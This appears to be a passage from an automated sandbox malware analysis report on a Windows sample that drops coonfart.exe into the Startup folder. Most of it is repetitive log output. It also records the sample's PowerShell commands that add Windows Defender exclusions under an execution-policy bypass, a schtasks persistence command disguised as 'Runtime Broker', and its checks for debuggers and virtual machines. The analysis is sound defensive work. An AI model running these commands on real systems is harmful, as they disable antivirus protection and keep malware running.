                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598110Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597985Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597860Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597735Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597610Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597485Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597360Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597235Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597110Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596985Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596735Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596610Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596485Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596360Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596235Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596110Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595985Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595860Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595735Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595610Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595485Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595360Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595231Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595124Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595016Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594903Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594797Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594688Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594563Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594454Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594329Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Runtime BrokerThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                        Source: coonfart.exe.0.drBinary or memory string: vmware
                        Source: coonfart.exe, 00000002.00000002.2926093012.000000001BC27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: 80BvHOM51j.exe, 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, 80BvHOM51j.exe, 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, 80BvHOM51j.exe, 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, coonfart.exe, 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, coonfart.exe, 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, Runtime Broker.2.dr, 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, coonfart.exe.0.drBinary or memory string: 7X8gDsDYpUHhgFStFhjRFgDC5
                        Source: 80BvHOM51j.exe, 00000000.00000002.2909568930.000001EE09ED3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2911664843.000001A4D0A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2913802841.000001A4D6058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: 80BvHOM51j.exe, 00000000.00000002.2909568930.000001EE09E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW J
                        Source: coonfart.exe, 00000002.00000002.2926093012.000000001BBE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 2_2_00007FFD9BAA76EA CheckRemoteDebuggerPresent,2_2_00007FFD9BAA76EA
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE863D8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6ACE863D8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\Public\Runtime BrokerProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE863D8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6ACE863D8
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE8657C SetUnhandledExceptionFilter,0_2_00007FF6ACE8657C
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE860F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6ACE860F0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe'
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker'
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker'Jump to behavior
                        Bypasses PowerShell execution policy
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe'
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" "Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coonfart.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
